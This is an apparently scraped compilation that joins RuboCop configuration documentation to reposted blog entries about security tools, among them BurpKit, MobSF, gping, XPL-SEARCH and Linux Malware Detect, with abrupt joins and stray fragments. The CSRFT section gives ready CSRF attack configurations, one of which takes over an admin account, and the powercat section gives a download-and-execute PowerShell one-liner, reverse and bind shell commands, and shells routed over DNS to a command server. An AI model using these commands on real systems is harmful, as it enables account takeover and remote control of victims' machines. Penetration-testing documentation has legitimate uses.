RuboCop checks all files found by a recursive search starting from the directory it is run in, or directories given as command line arguments. However, it only recognizes files ending with .rb or extensionless files with a #!.*ruby declaration as Ruby files. Hidden directories (i.e., directories whose names start with a dot) are not searched by default. If you'd like it to check files that are not included by default, you'll need to pass them in on the command line, or to add entries for them under AllCops / Include . Files and directories can also be ignored through AllCops / Exclude .
Here is an example that might be used for a Rails project:
AllCops:
Include:
- '**/Rakefile'
- '**/config.ru'
Exclude:
- 'db/**/*'
- 'config/**/*'
- 'script/**/*'
- !ruby/regexp /old_and_unused\.rb$/

# other configuration
# ...
Files and directories are specified relative to the .rubocop.yml file.
Note : Patterns that are just a file name, e.g. Rakefile , will match that file name in any directory, but this pattern style deprecated. The correct way to match the file in any directory, including the current, is **/Rakefile .
Note : The pattern config/** will match any file recursively under config , but this pattern style is deprecated and should be replaced by config/**/* .
Note : The Include and Exclude parameters are special. They are valid for the directory tree starting where they are defined. They are not shadowed by the setting of Include and Exclude in other .rubocop.yml files in subdirectories. This is different from all other parameters, who follow RuboCop's general principle that configuration for an inspected file is taken from the nearest .rubocop.yml , searching upwards.
Cops can be run only on specific sets of files when that's needed (for instance you might want to run some Rails model checks only on files whose paths match app/models/*.rb ). All cops support the Include param.
Rails/DefaultScope:
Include:
- app/models/*.rb
Cops can also exclude only specific sets of files when that's needed (for instance you might want to run some cop only on a specific file). All cops support the Exclude param.
Rails/DefaultScope:
Exclude:
- app/models/problematic.rb

Generic configuration parameters
In addition to Include and Exclude , the following parameters are available for every cop.

Enabled
Specific cops can be disabled by setting Enabled to false for that specific cop.
Metrics/LineLength:
Enabled: false
Most cops are enabled by default. Some cops, configured in config/disabled.yml , are disabled by default. The cop enabling process can be altered by setting DisabledByDefault to true .
AllCops:
DisabledByDefault: true
All cops are then disabled by default, and only cops appearing in user configuration files are enabled. Enabled: true does not have to be set for cops in user configuration. They will be enabled anyway.

Severity
Each cop has a default severity level based on which department it belongs to. The level is warning for Lint and convention for all the others. Cops can customize their severity level. Allowed params are refactor , convention , warning , error and fatal .
There is one exception from the general rule above and that is Lint/Syntax , a special cop that checks for syntax errors before the other cops are invoked. It can not be disabled and its severity ( fatal ) can not be changed in configuration.
Metrics/CyclomaticComplexity:
Severity: warning

AutoCorrect
Cops that support the --auto-correct option can have that support disabled. For example:
Style/PerlBackrefs:
AutoCorrect: false

Automatically Generated Configuration
If you have a code base with an overwhelming amount of offenses, it can be a good idea to use rubocop --auto-gen-config and add an inherit_from: .rubocop_todo.yml in your .rubocop.yml . The generated file .rubocop_todo.yml contains configuration to disable cops that currently detect an offense in the code by excluding the offending files, or disabling the cop altogether once a file count limit has been reached.
By adding the option --exclude-limit COUNT , e.g., rubocop --auto-gen-config --exclude-limit 5 , you can change how many files are excluded before the cop is entirely disabled. The default COUNT is 15.
Then you can start removing the entries in the generated .rubocop_todo.yml file one by one as you work through all the offenses in the code.

Disabling Cops within Source Code
One or more individual cops can be disabled locally in a section of a file by adding a comment such as
# rubocop:disable Metrics/LineLength, Style/StringLiterals
[...]
# rubocop:enable Metrics/LineLength, Style/StringLiterals
You can also disable all cops with
# rubocop:disable all
[...]
# rubocop:enable all
One or more cops can be disabled on a single line with an end-of-line comment.
for x in (0..19) # rubocop:disable Style/AvoidFor

Formatters
You can change the output format of RuboCop by specifying formatters with the -f/--format option. RuboCop ships with several built-in formatters, and also you can create your custom formatter.
Additionally the output can be redirected to a file instead of $stdout with the -o/--out option.
Some of the built-in formatters produce machine-parsable output and they are considered public APIs. The rest of the formatters are for humans, so parsing their outputs is discouraged.
You can enable multiple formatters at the same time by specifying -f/--format multiple times. The -o/--out option applies to the previously specified -f/--format , or the default progress format if no -f/--format is specified before the -o/--out option.
# Simple format to $stdout.
$ rubocop --format simple

# Progress (default) format to the file result.txt.
$ rubocop --out result.txt

# Both progress and offense count formats to $stdout.
# The offense count formatter outputs only the final summary,
# so you'll mostly see the outputs from the progress formatter,
# and at the end the offense count summary will be outputted.
$ rubocop --format progress --format offenses

# Progress format to $stdout, and JSON format to the file rubocop.json.
$ rubocop --format progress --format json --out rubocop.json
# ~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~
# | |_______________|
# $stdout

# Progress format to result.txt, and simple format to $stdout.
$ rubocop --output result.txt --format simple
# ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~
# | |
# default format $stdout
You can also load custom formatters .

Progress Formatter (default)
The default progress formatter outputs a character for each inspected file, and at the end it displays all detected offenses in the clang format. A . represents a clean file, and each of the capital letters means the severest offense (convention, warning, error or fatal) found in a file.
$ rubocop
Inspecting 26 files
..W.C....C..CWCW.C...WC.CC

Offenses:

lib/foo.rb:6:5: C: Missing top-level class documentation comment.
class Foo
^^^^^

...

26 files inspected, 46 offenses detected

Clang Style Formatter
The clang formatter displays the offenses in a manner similar to clang :
$ rubocop test.rb
Inspecting 1 file
W

Offenses:

test.rb:1:5: C: Use snake_case for method names.
def badName
^^^^^^^
test.rb:2:3: C: Use a guard clause instead of wrapping the code inside a conditional expression.
if something
^^
test.rb:2:3: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
if something
^^
test.rb:4:5: W: end at 4, 4 is not aligned with if at 2, 2
end
^^^

1 file inspected, 4 offenses detected

Fuubar Style Formatter
The fuubar style formatter displays a progress bar and shows details of offenses in the clang format as soon as they are detected. This is inspired by the Fuubar formatter for RSpec.
$ rubocop --format fuubar
lib/foo.rb.rb:1:1: C: Use snake_case for methods and variables.
def badName
^^^^^^^
lib/bar.rb:13:14: W: File.exists? is deprecated in favor of File.exist?.
File.exists?(path)
^^^^^^^
22/53 files |======== 43 ========> | ETA: 00:00:02

Emacs Style Formatter
Machine-parsable
The emacs formatter displays the offenses in a format suitable for consumption by Emacs (and possibly other tools).
$ rubocop --format emacs test.rb
/Users/bozhidar/projects/test.rb:1:1: C: Use snake_case for methods and variables.
/Users/bozhidar/projects/test.rb:2:3: C: Favor modifier if/unless usage when you have a single-line body. Another good alternative is the usage of control flow &&/||.
/Users/bozhidar/projects/test.rb:4:5: W: end at 4, 4 is not aligned with if at 2, 2

Simple Formatter
The name of the formatter says it all :-)
$ rubocop --format simple test.rb
== test.rb ==
C: 1: 5: Use snake_case for method names.
C: 2: 3: Use a guard clause instead of wrapping the code inside a conditional expression.
C: 2: 3: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
W: 4: 5: end at 4, 4 is not aligned with if at 2, 2

1 file inspected, 4 offenses detected

File List Formatter
Machine-parsable
Sometimes you might want to just open all files with offenses in your favorite editor. This formatter outputs just the names of the files with offenses in them and makes it possible to do something like:
$ rubocop --format files | xargs vim

JSON Formatter
Machine-parsable
You can get RuboCop's inspection result in JSON format by passing --format json option in command line. The JSON structure is like the following example:
{
"metadata": {
"rubocop_version": "0.9.0",
"ruby_engine": "ruby",
"ruby_version": "2.0.0",
"ruby_patchlevel": "195",
"ruby_platform": "x86_64-darwin12.3.0"
},
"files": [{
"path": "lib/foo.rb",
"offenses": []
}, {
"path": "lib/bar.rb",
"offenses": [{
"severity": "convention",
"message": "Line is too long. [81/80]",
"cop_name": "LineLength",
"corrected": true,
"location": {
"line": 546,
"column": 80,
"length": 4
}
}, {
"severity": "warning",
"message": "Unreachable code detected.",
"cop_name": "UnreachableCode",
"corrected": false,
"location": {
"line": 15,
"column": 9,
"length": 10
}
}
]
}
],
"summary": {
"offense_count": 2,
"target_file_count": 2,
"inspected_file_count": 2
}
}

Offense Count Formatter
Sometimes when first applying RuboCop to a codebase, it's nice to be able to see where most of your style cleanup is going to be spent.
With this in mind, you can use the offense count formatter to outline the offended cops and the number of offenses found for each by running:
$ rubocop --format offenses

87 Documentation
12 DotPosition
8 AvoidGlobalVars
7 EmptyLines
6 AssignmentInCondition
4 Blocks
4 CommentAnnotation
3 BlockAlignment
1 IndentationWidth
1 AvoidPerlBackrefs
1 ColonMethodCall
--
134 Total

HTML Formatter
Useful for CI environments. It will create an HTML report like this .
$ rubocop --format html -o rubocop.html

Compatibility
RuboCop supports the following Ruby implementations:
  • MRI 1.9.3
  • MRI 2.0
  • MRI 2.1
  • MRI 2.2
  • JRuby in 1.9 mode
  • Rubinius 2.0+

Editor integration

Emacs
rubocop.el is a simple Emacs interface for RuboCop. It allows you to run RuboCop inside Emacs and quickly jump between problems in your code.
flycheck > 0.9 also supports RuboCop and uses it by default when available.

Vim
The vim-rubocop plugin runs RuboCop and displays the results in Vim.
There's also a RuboCop checker in syntastic .

Sublime Text
If you're a ST user you might find the Sublime RuboCop plugin useful.

Brackets
The brackets-rubocop extension displays RuboCop results in Brackets. It can be installed via the extension manager in Brackets.

TextMate2
The textmate2-rubocop bundle displays formatted RuboCop results in a new window. Installation instructions can be found here .

Atom
The atom-lint package runs RuboCop and highlights the offenses in Atom.
You can also use the linter-rubocop plugin for Atom's linter .

LightTable
The lt-rubocop plugin provides LightTable integration.

RubyMine
The rubocop-for-rubymine plugin provides basic RuboCop integration for RubyMine/IntelliJ IDEA.

Other Editors
Here's one great opportunity to contribute to RuboCop - implement RuboCop integration for your favorite editor.

Git pre-commit hook integration
overcommit is a fully configurable and extendable Git commit hook manager. To use RuboCop with overcommit, add the following to your .overcommit.yml file:
PreCommit:
RuboCop:
enabled: true

Guard integration
If you're fond of Guard you might like guard-rubocop . It allows you to automatically check Ruby code style with RuboCop when files are modified.

Rake integration
To use RuboCop in your Rakefile add the following:
require 'rubocop/rake_task'

RuboCop::RakeTask.new
If you run rake -T , the following two RuboCop tasks should show up:
rake rubocop                                  # Run RuboCop
rake rubocop:auto_correct # Auto-correct RuboCop offenses
The above will use default values
require 'rubocop/rake_task'

desc 'Run RuboCop on the lib directory'
RuboCop::RakeTask.new(:rubocop) do |task|
task.patterns = ['lib/**/*.rb']
# only show the files with failures
task.formatters = ['files']
# don't abort rake on failure
task.fail_on_error = false
end

Caching
Large projects containing hundreds or even thousands of files can take a really long time to inspect, but RuboCop has functionality to mitigate this problem. There's a caching mechanism that stores information about offenses found in inspected files.

Cache Validity
Later runs will be able to retrieve this information and present the stored information instead of inspecting the file again. This will be done if the cache for the file is still valid, which it is if there are no changes in:
  • the contents of the inspected file
  • RuboCop configuration for the file
  • the options given to rubocop , with some exceptions that have no bearing on which offenses are reported
  • the Ruby version used to invoke rubocop
  • version of the rubocop program (or to be precise, anything in the source code of the invoked rubocop program)

Enabling and Disabling the Cache
The caching functionality is enabled if the configuration parameter AllCops: UseCache is true , which it is by default. The command line option --cache false can be used to turn off caching, thus overriding the configuration parameter. If AllCops: UseCache is set to false in the local .rubocop.yml , then it's --cache true that overrides the setting.

Cache Path
By default, the cache is stored in in a subdirectory of the temporary directory, /tmp/rubocop_cache/ on Unix-like systems. The configuration parameter AllCops: CacheRootDirectory can be used to set it to a different path. One reason to use this option could be that there's a network disk where users on different machines want to have a common RuboCop cache. Another could be that a Continuous Integration system allows directories, but not a temporary directory, to be saved between runs.

Cache Pruning
Each time a file has changed, its offenses will be stored under a new key in the cache. This means that the cache will continue to grow until we do something to stop it. The configuration parameter AllCops: MaxFilesInCache sets a limit, and when the number of files in the cache exceeds that limit, the oldest files will be automatially removed from the cache.

Extensions
It's possible to extend RuboCop with custom cops and formatters.

Loading Extensions
Besides the --require command line option you can also specify ruby files that should be loaded with the optional require directive in the .rubocop.yml file:
require:
- ../my/custom/file.rb
- rubocop-extension
Note: The paths are directly passed to Kernel.require . If your extension file is not in $LOAD_PATH , you need to specify the path as relative path prefixed with ./ explicitly, or absolute path.

Custom Cops
You can configure the custom cops in your .rubocop.yml just like any other cop.

Known Custom Cops

Custom Formatters
You can customize RuboCop's output format with custom formatters.

Creating Custom Formatter
To implement a custom formatter, you need to subclass RuboCop::Formatter::BaseFormatter and override some methods, or implement all formatter API methods by duck typing.
Please see the documents below for more formatter API details.

Using Custom Formatter in Command Line
You can tell RuboCop to use your custom formatter with a combination of --format and --require option. For example, when you have defined MyCustomFormatter in ./path/to/my_custom_formatter.rb , you would type this command:
$ rubocop --require ./path/to/my_custom_formatter --format MyCustomFormatter


Burpkit - Next-Gen Burpsuite Penetration Testing Tool

$
0
0

Welcome to the next generation of web application penetration testing - using WebKit to own the web. BurpKit is a BurpSuite plugin which helps in assessing complex web apps that render the contents of their pages dynamically. It also provides a bi-directional JavaScript bridge API which allows users to create quick one-off BurpSuite plugin prototypes which can interact directly with the DOM and Burp's extender API.

System Requirements
BurpKit has the following system requirements:
  • Oracle JDK >=8u50 and <9 ( Download )
  • At least 4GB of RAM

Installation
Installing BurpKit is simple:
  1. Download the latest prebuilt release from the GitHub releases page .
  2. Open BurpSuite and navigate to the Extender tab.
  3. Under Burp Extensions click the Add button.
  4. In the Load Burp Extension dialog, make sure that Extension Type is set to Java and click the Select file ... button under Extension Details .
  5. Select the BurpKit-<version>.jar file and click Next when done.
If all goes well, you will see three additional top-level tabs appear in BurpSuite:
  1. BurpKitty : a courtesy browser for navigating the web within BurpSuite.
  2. BurpScript IDE : a lightweight integrated development environment for writing JavaScript-based BurpSuite plugins and other things.
  3. Jython : an integrated python interpreter console and lightweight script text editor.

BurpScript
BurpScript enables users to write desktop-based JavaScript applications as well as BurpSuite extensions using the JavaScript scripting language. This is achieved by injecting two new objects by default into the DOM on page load:
  1. burpKit : provides numerous features including file system I/O support and easy JS library injection.
  2. burpCallbacks : the JavaScript equivalent of the IBurpExtenderCallbacks interface in Java with a few slight modifications.
Take a look at the examples folder for more information.

More Information?
A readable version of the docs can be found at here



CSRFT - Cross Site Request Forgeries (Exploitation) Toolkit

$
0
0

This project has been developed to exploit CSRF Web vulnerabilities and provide you a quick and easy exploitation toolkit. In few words, this is a simple HTTP Server in NodeJS that will communicate with the clients (victims) and send them payload that will be executed using JavaScript.

This has been developed entirely in NodeJS, and configuration files are in JSON format.

* However, there's a tool in Python in utils folder that you can use to automate CSRF exploitation. *

This project allows you to perform PoC (Proof Of Concepts) really easily. Let's see how to get/use it.

How to get/use the tool
First, clone it :
$ git clone git@github.com:PaulSec/CSRFT.git
To make this project work, get the latest Node.js version here . Go in the directory and install all the dependencies:
npm install
Then, launch the server.js :
$ node server.js
Usage will be displayed :
Usage : node server.js <file.json> <port : default 8080>

More information
By default, the server will be launched on the port 8080, so you can access it via : http://0.0.0.0:8080 .
The JSON file must describe your several attack scenarios. It can be wherever you want on your hard drive.
The index page displayed on the browser is accessible via : /views/index.ejs .
You can change it as you want and give the link to your victim.

Different folders : What do they mean ?
The idea is to provide a 'basic' hierarchy (of the folders) for your projects. I made the script quite modular so your configuration files/malicious forms, etc. don't have to be in those folders though. This is more like a good practice/advice for your future projects.

However, here is a little summary of those folders :
  • conf folder : add your JSON configuration file with your configuration.
  • exploits folder : add all your *.html files containing your forms
  • public folder : containing jquery.js and inject.js (script loaded when accessing 0.0.0.0:8080)
  • views folder : index file and exploit template
  • dicos : Folder containing all your dictionnaries for those attacks
  • lib : libs specific for my project (custom ones)
  • utils : folder containing utils such as : csrft_utils.py which will launch CSRFT directly.
  • server.js file - the HTTP server

Configuration file templates

GET Request with special value
Here is a basic example of JSON configuration file that will target www.vulnerable.com This is a special value because the malicious payload is already in the URL/form.
{
"audit": {
"name": "PoC done with Automatic Tool",
"scenario": [
{
"attack": [
{
"method": "GET",
"type_attack": "special_value",
"url": "http://www.vulnerable.com/changePassword.php?newPassword=csrfAttacks"
}
]
}
]
}
}

GET Request with dictionnary attack
Here is a basic example of JSON configuration file. For every entry in the dictionnary file, there will be a HTTP Request done.
{
"audit": {
"name": "PoC done with Automatic Tool",
"scenario": [
{
"attack": [
{
"file": "./dicos/passwords.txt",
"method": "GET",
"type_attack": "dico",
"url": "http://www.vulnerable.com/changePassword.php?newPassword=<%value%>"
}
]
}
]
}
}

POST Request with special value attack
{
"audit": {
"name": "PoC done with Automatic Tool",
"scenario": [
{
"attack": [
{
"form": "/tmp/csrft/form.html",
"method": "POST",
"type_attack": "special_value"
}
]
}
]
}
}
The form already includes the malicious payload. So it just has to be executed by the victim.
I hope you understood the principles. I didn't write an example for a POST with dictionnary attack because there will be one in the next section.

Ok but what do Scenario and Attack mean ?
A scenario is composed of attacks. Those attacks can be simultaneous or at different time.
For example, you want to sign the user in and THEN , you want him to perform some unwanted actions. You can specify it in the JSON file.
Let's take an example with both POST and GET Request :
{
"audit": {
"name": "DeepSec | Login the admin, give privilege to the Hacker and log him out",

"scenario": [
{
"attack": [
{
"method": "POST",
"type_attack": "dico",
"file": "passwords.txt",
"form": "deepsec_form_log_user.html",
"comment": "attempt to connect the admin with a list of selected passwords"
}
]
},
{
"attack": [
{
"method": "GET",
"type_attack": "special_value",
"url": "http://192.168.56.1/vuln-website/index.php/welcome/upgrade/27",
"comment": "then, after the login session, we expect the admin to be logged in, attempt to upgrade our account"
}
]
},
{
"attack": [
{
"method": "GET",
"type_attack": "special_value",
"url": "http://192.168.56.1/vuln-website/index.php/welcome/logout",
"comment": "The final step is to logout the admin"
}
]
}
]
}
}
You can now define some "steps", different attacks that will be executed in a certain order.

Use cases

A) I want to write my specific JSON configuration file and launch it by hand
Based on the templates which are available, you can easily create your own. If you have any trouble creating it, feel free to contact me and I'll try to help you as much as I can but it shoudn't be this complicated.
Steps to succeed :
1) Create your configuration file, see samples in conf/ folder
2) Add your .html files in the exploits/ folder with the different payloads if the CSRF is POST vulnerable
3) If you want to do Dictionnary attack, add your dictionnary file to the dicos/ folder,
4) Replace the value of the field you want to perform this attack with the token <%value%>
=> either in your urls if GET exploitation, or in the HTML files if POST exploitation.
5) Launch the application : node server.js conf/test.json


B) I want to automate attacks really easily
To do so, I developed a Python script csrft_utils.py in utils folder that will do this for you.
Here are some basic use cases :
* GET parameter with Dictionnary attack : *
$ python csrft_utils.py --url="http://www.vulnerable.com/changePassword.php?newPassword=csvulnerableParameter" --param=newPassword --dico_file="../dicos/passwords.txt"
* POST parameter with Special value attack : *
$ python csrft_utils.py --form=http://website.com/user.php --id=changePassword --param=password password=newPassword --special_value


Gping - Ping, But With A Graph

$
0
0

Ping, but with a graph

Install and run
Created/tested with Python 3.4, should run on 2.7 (will require the statistics module though).
pip3 install pinggraph

Tested on Windows and Ubuntu, should run on OS X as well. After installation just run:
gping [yourhost]

If you don't give a host then it pings google.

Why?
My apartments internet is all 4g, and while it's normally pretty fast it can be a bit flakey. I often found myself running ping -t google.com in a command window to get a rough idea of the network speed, and I thought a graph would be a great way to visualize the data. I still wanted to just use the command line though, so I decided to try and write a cross platform one that I could use. And here we are.

Code
For a quick hack the code started off really nice, but after I decided pretty colors were a good addition it quickly got rather complicated. Inside pinger.py is a function plot() , this uses a canvas-like object to "draw" things like lines and boxes to the screen. I found on Windows that changing the colors is slow and caused the screen to flicker, so theres a big mess of a function called process_colors to try and optimize that. Don't ask.


MobSF (Mobile Security Framework) - Mobile (Android/iOS) Automated Pen-Testing Framework

$
0
0

Mobile Security Framework (MobSF) is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. We've been depending on multiple tools to carry out reversing, decoding, debugging, code review, and pen-test and this process requires a lot of effort and time. Mobile Security Framework can be used for effective and fast security analysis of Android and iOS Applications. It supports binaries (APK & IPA) and zipped source code.

The static analyzer is able to perform automated code review, detect insecure permissions and configurations, and detect insecure code like ssl overriding, ssl bypass, weak crypto, obfuscated codes, improper permissions, hardcoded secrets, improper usage of dangerous APIs, leakage of sensitive/PII information, and insecure file storage. The dynamic analyzer runs the application in a VM or on a configured device and detects the issues at run time. Further analysis is done on the captured network packets, decrypted HTTPS traffic, application dumps, logs, error or crash reports, debug information, stack trace, and on the application assets like setting files, preferences, and databases. This framework is highly scalable that you can add your custom rules with ease. A quick and clean report can be generated at the end of the tests. We will be extending this framework to support other mobile platforms like Tizen, WindowsPhone etc. in future.

Documentation

Queries

Screenshots and Sample Report

Static Analysis - Android APK




Static Analysis - iOS IPA



Sample Report: http://opensecurity.in/research/security-analysis-of-android-browsers.html

v0.8.8 Changelog
  • New name: Mobile Security Framework (MobSF)
  • Added Dynamic Analysis
  • VM Available for Download
  • Fixed RCE
  • Fixed Broken Manifest File Parsing Logic
  • Sqlite DB Support
  • Fixed Reporting with new PDF report
  • Rescan Option
  • Detect Root Detection
  • Added Requiremnts.txt
  • Automated Java Path Detection
  • Improved Manifest and Code Analysis
  • Fixed Unzipping error for Unix.
  • Activity Tester Module
  • Exported Activity Tester Module
  • Device API Hooker with DroidMon
  • SSL Certificate Pinning Bypass with JustTrustMe
  • RootCloak to prevent root Detection
  • Data Pusher to Dump Application Data
  • pyWebproxy to decrypt SSL Traffic

v0.8.7 Changelog
  • Improved Static Analysis Rules
  • Better AndroidManifest View
  • Search in Files

v0.8.6 Changelog
  • Detects implicitly exported component from manifest.
  • Added CFR decompiler support
  • Fixed Regex DoS on URL Regex

v0.8.5 Changelog
  • Bug Fix to support IPA MIME Type: application/x-itunes-ipa

v0.8.4 Changelog
  • Improved Android Static Code Analysis speed (2X performance)
  • Static Code analysis on Dexguard protected APK.
  • Fixed a Security Issue - Email Regex DoS.
  • Added Logging Code.
  • All Browser Support.
  • MIME Type Bug fix to Support IE.
  • Fixed Progress Bar.

v0.8.3 Changelog
  • View AndroidManifest.xml & Info.plist
  • Supports iOS Binary (IPA)
  • Bug Fix for Linux (Ubuntu), missing MIME Type Detection
  • Check for Hardcoded Certificates
  • Added Code to prevent from Directory Traversal

Credits
  • Bharadwaj Machiraju (@tunnelshade_) - For writing pyWebProxy from scratch
  • Thomas Abraham - For JS Hacks on UI.
  • Anto Joseph (@antojosep007) - For the help with SuperSU.
  • Tim Brown (@timb_machine) - For the iOS Binary Analysis Ruleset.
  • Abhinav Sejpal (@Abhinav_Sejpal) - For poking me with bugs and feature requests.
  • Anant Srivastava (@anantshri) - For Activity Tester Idea


Powercat - Netcat: The Powershell Version

$
0
0

Installation
powercat is a powershell function. First you need to load the function before you can execute it. You can put one of the below commands into your powershell profile so powercat is automatically loaded when powershell starts.
Load The Function From Downloaded .ps1 File:
. .\powercat.ps1
Load The Function From URL:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Parameters:
-l      Listen for a connection.                             [Switch]
-c Connect to a listener. [String]
-p The port to connect to, or listen on. [String]
-e Execute. (GAPING_SECURITY_HOLE) [String]
-ep Execute Powershell. [Switch]
-r Relay. Format: "-r tcp:10.1.1.1:443" [String]
-u Transfer data over UDP. [Switch]
-dns Transfer data over dns (dnscat2). [String]
-dnsft DNS Failure Threshold. [int32]
-t Timeout option. Default: 60 [int32]
-i Input: Filepath (string), byte array, or string. [object]
-o Console Output Type: "Host", "Bytes", or "String" [String]
-of Output File Path. [String]
-d Disconnect after connecting. [Switch]
-rep Repeater. Restart after disconnecting. [Switch]
-g Generate Payload. [Switch]
-ge Generate Encoded Payload. [Switch]
-h Print the help message. [Switch]

Basic Connections
By default, powercat reads input from the console and writes input to the console using write-host. You can change the output type to 'Bytes', or 'String' with -o.
Basic Client:
powercat -c 10.1.1.1 -p 443
Basic Listener:
powercat -l -p 8000
Basic Client, Output as Bytes:
powercat -c 10.1.1.1 -p 443 -o Bytes

File Transfer
powercat can be used to transfer files back and forth using -i (Input) and -of (Output File).
Send File:
powercat -c 10.1.1.1 -p 443 -i C:\inputfile
Recieve File:
powercat -l -p 8000 -of C:\inputfile

Shells
powercat can be used to send and serve shells. Specify an executable to -e, or use -ep to execute powershell.
Serve a cmd Shell:
powercat -l -p 443 -e cmd
Send a cmd Shell:
powercat -c 10.1.1.1 -p 443 -e cmd
Serve a shell which executes powershell commands:
powercat -l -p 443 -ep

DNS and UDP
powercat supports more than sending data over TCP. Specify -u to enable UDP Mode. Data can also be sent to a dnscat2 server with -dns.
Send Data Over UDP:
powercat -c 10.1.1.1 -p 8000 -u
powercat -l -p 8000 -u
Connect to the c2.example.com dnscat2 server using the DNS server on 10.1.1.1:
powercat -c 10.1.1.1 -p 53 -dns c2.example.com
Send a shell to the c2.example.com dnscat2 server using the default DNS server in Windows:
powercat -dns c2.example.com -e cmd

Relays
Relays in powercat work just like traditional netcat relays, but you don't have to create a file or start a second process. You can also relay data between connections of different protocols.
TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:10.1.1.16:443
TCP Listener to UDP Client Relay:
powercat -l -p 8000 -r udp:10.1.1.16:53
TCP Listener to DNS Client Relay
powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
TCP Listener to DNS Client Relay using the Windows Default DNS Server
powercat -l -p 8000 -r dns:::c2.example.com
TCP Client to Client Relay
powercat -c 10.1.1.1 -p 9000 -r tcp:10.1.1.16:443
TCP Listener to Listener Relay
powercat -l -p 8000 -r tcp:9000

Generate Payloads
Payloads which do a specific action can be generated using -g (Generate Payload) and -ge (Generate Encoded Payload). Encoded payloads can be executed with powershell -E. You can use these if you don't want to use all of powercat.
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
powercat -c 10.1.1.15 -p 443 -e cmd -g
Generate a bind tcp encoded command which listens on port 8000:
powercat -l -p 8000 -e cmd -ge

Misc Usage
powercat can also be used to perform portscans, and start persistent servers.
Basic TCP Port Scanner:
(21,22,80,443) | % {powercat -c 10.1.1.10 -p $_ -t 1 -Verbose -d}
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep


XPL-SEARCH - Search Exploits In Multiple Exploit Databases

$
0
0

XPL SEARCH
Search exploits in multiple exploit databases!
Exploit databases available:
* Exploit-DB
* MIlw0rm
* PacketStormSecurity
* IntelligentExploit
* IEDB
* CVE

TO RUN THE SCRIPT
PHP Version (cli) 5.5.8 or higher
php5-cli Lib
cURL support Enabled
php5-curl Lib
cURL Version 7.40.0 or higher
allow_url_fopen On
Permission Writing & Reading

ABOUT DEVELOPER
Author_Nick       CoderPIRATA
Author_Name Eduardo
Email coderpirata@gmail.com
Blog http://coderpirata.blogspot.com.br/
Twitter https://twitter.com/coderpirata
Google+ https://plus.google.com/103146866540699363823
Pastebin http://pastebin.com/u/CoderPirata
Github https://github.com/coderpirata/

"CHANGELOG"
0.1 - [02/07/2015]
- Started.

0.2 - [12/07/2015]
- Added Exploit-DB.
- Added Colors, only for linux!
- Added Update Function.
- "Generator" of User-Agent reworked.
- Small errors and adaptations.

0.3 - [22/07/2015]
- Bugs solved.
- Added "save" Function.
- Added "set-db" function.

0.4 - [05/08/2015]
- Save function modified.
- Added Scan with list.

0.5 - [29/08/2015]
- Added search by Author.

0.6 - [09/09/2015]
- Now displays the author of the exploit.
* Does not work with IntelligentExploit.
- Changes in search logs.

0.7 - [11/09/2015]
- Added search in CVE.
* ID.
* Simple search - id 6.
- Bug in exploit-db search, "papers" fixed.
- Added standard time of 60 seconds for each request.
- file_get_contents() was removed from "browser()".
- Code of milw00rm search has been modified.
- Changes in search logs.
- Added date.

0.7.1 - [17/09/2015]
- Bug in milw00rm solved

0.8 - [05/10/2015]
- Added shebang.
- Commands "save", "save-log" and "save-dir" have been modified.
- Added "no-db" option.
- GETOPT() modified - Thanks Jack2.
- Bug on save-dir solved.
- Others minor bugs solved.

Screenshot




LMD - Linux Malware Detect

$
0
0
Linux Malware Detect (LMD) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and from malware community resources. The signatures that LMD uses are MD5 file hashes and HEX pattern matches, they are also easily exported to any number of detection tools such as ClamAV.

The driving force behind LMD is that there is currently limited availability of open source/restriction free tools for Linux systems that focus on malware detection and more important that get it right. Many of the AV products that perform malware detection on Linux have a very poor track record of detecting threats, especially those targeted at shared hosted environments.

The threat landscape in shared hosted environments is unique from that of the standard AV products detection suite in that they are detecting primarily OS level trojans, rootkits and traditional file-infecting viruses but missing the ever increasing variety of malware on the user account level which serves as an attack platform.

The commercial products available for malware detection and remediation in multi-user shared environments remains abysmal. An analysis of 8,883 malware hashes, detected by LMD 1.5, against 30 commercial anti-virus and malware products paints a picture of how poorly commercial solutions perform.
DETECTED KNOWN MALWARE: 1951
% AV DETECT (AVG): 58
% AV DETECT (LOW): 10
% AV DETECT (HIGH): 100
UNKNOWN MALWARE: 6931
Using the Team Cymru malware hash registry, we can see that of the 8,883 malware hashes shipping with LMD 1.5, there was 6,931 or 78% of threats that went undetected by 30 commercial anti-virus and malware products. The 1,951 threats that were detected had an average detection rate of 58% with a low and high detection rate of 10% and 100% respectively. There could not be a clearer statement to the need for an open and community driven malware remediation project that focuses on the threat landscape of multi-user shared environments.

Features:
  • MD5 file hash detection for quick threat identification
  • HEX based pattern matching for identifying threat variants
  • statistical analysis component for detection of obfuscated threats (e.g: base64)
  • integrated detection of ClamAV to use as scanner engine for improved performance
  • integrated signature update feature with -u|–update
  • integrated version update feature with -d|–update-ver
  • scan-recent option to scan only files that have been added/changed in X days
  • scan-all option for full path based scanning
  • checkout option to upload suspected malware to rfxn.com for review / hashing
  • full reporting system to view current and previous scan results
  • quarantine queue that stores threats in a safe fashion with no permissions
  • quarantine batching option to quarantine the results of a current or past scans
  • quarantine restore option to restore files to original path, owner and perms
  • quarantine suspend account option to Cpanel suspend or shell revoke users
  • cleaner rules to attempt removal of malware injected strings
  • cleaner batching option to attempt cleaning of previous scan reports
  • cleaner rules to remove base64 and gzinflate(base64 injected malware
  • daily cron based scanning of all changes in last 24h in user homedirs
  • daily cron script compatible with stock RH style systems, Cpanel & Ensim
  • kernel based inotify real time file scanning of created/modified/moved files
  • kernel inotify monitor that can take path data from STDIN or FILE
  • kernel inotify monitor convenience feature to monitor system users
  • kernel inotify monitor can be restricted to a configurable user html root
  • kernel inotify monitor with dynamic sysctl limits for optimal performance
